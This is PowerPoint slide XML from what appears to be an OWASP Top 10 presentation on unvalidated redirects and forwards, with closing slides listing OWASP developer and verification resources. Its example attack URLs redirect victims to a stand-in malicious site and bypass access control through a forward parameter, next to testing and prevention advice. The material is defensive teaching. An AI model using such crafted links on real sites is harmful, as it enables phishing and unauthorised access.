              <a:t>Insufficient Transport Layer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A9</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48521"/>
          <a:ext cx="6858000" cy="2536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2446">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51035">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trick your users into submitting a request to your website. Any website or other HTML feed that your users use could do this.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attacker links to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. Attacker targets unsafe forward to bypass security checks.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rPr>
                        <a:t>Applications frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> parameter, allowing attackers to choose the destination page.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecting unchecked redirects is easy. Look for redirects where you can set the full URL. Unchecked forwards are harder, since they target internal pages.</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Such redirects may</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.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retaining</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>your users’ trust</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.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What if they get owned by malware?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What if attackers can access internal only functions?</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The application has a page called “redirect.jsp” which takes a single parameter named “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </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:The application uses forward to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forward the attacker to an administrative function that she would not normally be able to access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/boring.jsp?fwd=admin.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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has any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> redirects or forwards is to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review the code for all uses of redirect or forward (called a transfer in .NET). For each use, identify if the target URL is included in any parameter values. If so, verify the parameter(s) are validated to contain only an allowed destination, or element of a destination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also, spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If code is unavailable, check all parameters to see if they look like part of a redirect or forward URL destination and test those that do.</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Article on Open Redirects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ESAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SecurityWrapperResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> sendRedirect() method</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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7"/>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CWE Entry 601 on Open Redirects </a:t>
            </a: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WASC Article on URL Redirector Abuse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Google blog article on the dangers of open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>redirects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1"/>
              </a:rPr>
              <a:t>OWASP Top 10 for .NET article on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Redirects and Forwards</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Safe use of redirects and forwards can be done in a number of ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simply avoid using redirects and forwards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If used, don’t involve user parameters in calculating the destination. This can usually be done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If destination parameters can’t be avoided, ensure that the supplied value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	It is recommended that any such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Applications can use ESAPI to override the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>sendRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method to make sure all redirect destinations are safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding such flaws is extremely important as they are a favorite target of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trying to gain the user’s trust.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Redirects and Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A10</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371600"/>
          <a:ext cx="6858000" cy="7772400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="373347">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> and Use a Full Set of Common Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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3990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Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this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2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Many Free and Open OWASP Resources Are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To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their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There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, which lists all of the OWASP projects, organized by the release quality of the projects in question (Release Quality, Beta, or Alpha). Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>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itle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Diagram 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="3390900"/>
          <a:ext cx="87630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1143001"/>
          <a:ext cx="6858000" cy="3474720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="306434">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F9FBFD"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Get Organized</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1"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6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To verify the security of a web application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> you have developed, or one you are considering purchasing, OWASP recommends that you review the application’s code (if available), and test the application as well. OWASP recommends a combination of security code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both techniques, and the two approaches complement each other. Tools for assisting the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP’s assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process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Standardizing How You Verify Web Application Security: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>To help organizations develop consistency and a defined level of rigor when assessing the security of web applications, OWASP has produced the OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. This document defines a minimum verification standard for performing web application security assessments. OWASP recommends that you use the ASVS as guidance for not only what to look for when verifying the security of a web application, but also which techniques are most appropriate to use, and to help you define and select a level of rigor when verifying the security of a web application. OWASP also recommends you use the ASVS to help define and select any web application assessment services you might procure from a third party provider.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Assessment Tools Suite:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Live CD Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> has pulled together some of the best open source security tools into a single bootable environment. Web developers, testers, and security professionals can boot from this Live CD and immediately have access to a full security testing suite. No installation or configuration is required to use the tools provided on this CD.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tle 5"/>
